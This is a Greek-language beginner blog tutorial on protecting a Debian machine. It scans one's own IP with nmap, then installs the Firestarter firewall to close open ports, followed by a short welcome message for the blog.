Τέλος στην καρτέλα Policy μας δίνετε η δυνατότητα να "προσθέσουμε κανόνα",για παράδειγμα να ανοίξουμε μια πόρτα,κάτι που *δεν* θα συνηστούσα!

Tutorial 01:Setting Up firewall on Debian,closing all ports

Γειά σας!
Σαν πρώτο tutorial θα μιλήσουμε για το πώς μπορείτε να εγκαταστήσετε ένα καλό
firewall(http://en.wikipedia.org/wiki/Firewall_%28computing%29) με αποτέλεσμα την ασφάλεια σας στο ιντερνετ αλλά και το κλείσιμο των ανοικτών πορτών στο σύστημα σας!(http://en.wikipedia.org/wiki/Port_%28computer_networking%29)

Απαραίτητες προυποθέσεις:Debian Operating System,wireless connection

Step 1)Ανοίξτε το terminal γίνεται root με την εντολή su και δώστε κωδικό.Στην συνέχεια κατεβάστε το nmap με την εντολή apt-get install nmap

Η οθόνη σας θα δείχνει κάπως έτσι.

Step 2)Στην συνέχεια γράψτε στο Terminal την εντολή ifconfig ώστε να δείτε την IP σας.

Η οθόνη σας θα δείχνει κάπως έτσι που ίσως να έχει την διαφορά πως αντί για eth1 να έχετε wlan0.Επίσης όπως είναι λογικό θα έχετε διαφορετικές διευθύνσεις.

Step 3)Τώρα πρέπει να κάνετε ενα scan για ανοιχτές πόρτες με την εντολή στο Terminal: nmap -v ip στην θέση της ip βάλτε την ip διεύθηνση σας που μάθατε απο το προηγούμενο βήμα.

Step 4)Ανοίξτε το Terminal και δώστε την παρακάτω εντολή

apt-get install firestarter

Όταν ολοκληρωθεί η εγκατάσταση πατήστε Applications>Internet>Firestarter και θα είστε ετοιμοι.

Τέλος κάντε άλλο ένα scan με nmap με την εντολή nmap -v ip (όπου ip ειναι η δικία σας ip π.χ 192.168.1.3) και τα αποτελέσματα είναι ολοφάνερα.Σχεδόν καμία πόρτα ανοιχτή!

Welcome!

Καλώς ήλθατε στο ολοκαίνουργιο 010life blogspot!Ενα blog κατάλληλο για οσους ασχολούντε με Υπολογιστές και όσους θέλουν να μαθαίνουν μέσω απο τα tutorials αλλά και επίσης να ενημερώνονται για διάφορα καθημερινά θέματα!Enjoy it!

010life - Because your 10nd life belongs here.